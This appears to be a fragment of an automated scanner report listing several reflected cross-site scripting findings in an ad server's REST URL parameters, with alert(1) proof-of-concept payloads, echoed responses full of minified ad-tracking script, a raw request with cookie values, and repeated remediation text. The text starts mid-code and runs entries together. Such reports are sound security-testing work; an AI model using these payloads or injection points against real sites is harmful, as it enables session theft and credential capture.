b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-3400467_1289162288","http://vulnerable.ad.partner//idgt.technewsworlddc66f'-alert(1)-'2edc89fb87e/home_above;net=idgt;u=,idgt-3400467_1289162288,11c4bc59fd87e17,none,idgt.virtualization_l;;contx=none;dc=d;btg=idgt.virtualization_l?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    7713722130808963072 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    68b49'-alert(1)-'baffe502f63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    3267105834913561600 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    992b2'-alert(1)-'8559ad89c17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-20414562_1289163525","http://vulnerable.ad.partner/adj992b2'-alert(1)-'8559ad89c17/idgt.technewsworld/home_below;net=idgt;u=,idgt-20414562_1289163525,11c4bc59fd87e17,virtualization,idgt.virtualization_h-idgt.virtualization_l-idgt.virtualization_m;;sec=home;fold=below;tile=4;cmw=owl;sz=300x250;net=idgt;ord1=67354;contx=virtualization;dc=d;btg=idgt.virtualization_h;btg=idgt.virtualization_l;btg=idgt.virtualization_m;ord=7841097520626027?","300","250",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731");CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=185759072;redirect=http://a.collective-media.net/datapair?net=qc&id=11c4bc59fd87e17&segs=!qcsegs&op=add");]]> false
    5093356573185075200 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    40e8e<script>alert(1)</script>187d913218f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    alert(1)187d913218f/idgt.technewsworld/home_above HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; qcms=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1; ]]> alert(1)187d913218f/idgt.technewsworld/home_above]]> false
    6009651134580136960 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    a7082'-alert(1)-'8f8ec36af23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-56311105_1289162290","http://vulnerable.ad.partner//idgt.technewsworld/home_abovea7082'-alert(1)-'8f8ec36af23;net=idgt;u=,idgt-56311105_1289162290,11c4bc59fd87e17,none,idgt.virtualization_l;;contx=none;dc=d;btg=idgt.virtualization_l?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    5432953535270176768 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    df7ec'-alert(1)-'cedb89b50be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    7910923414003852288 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

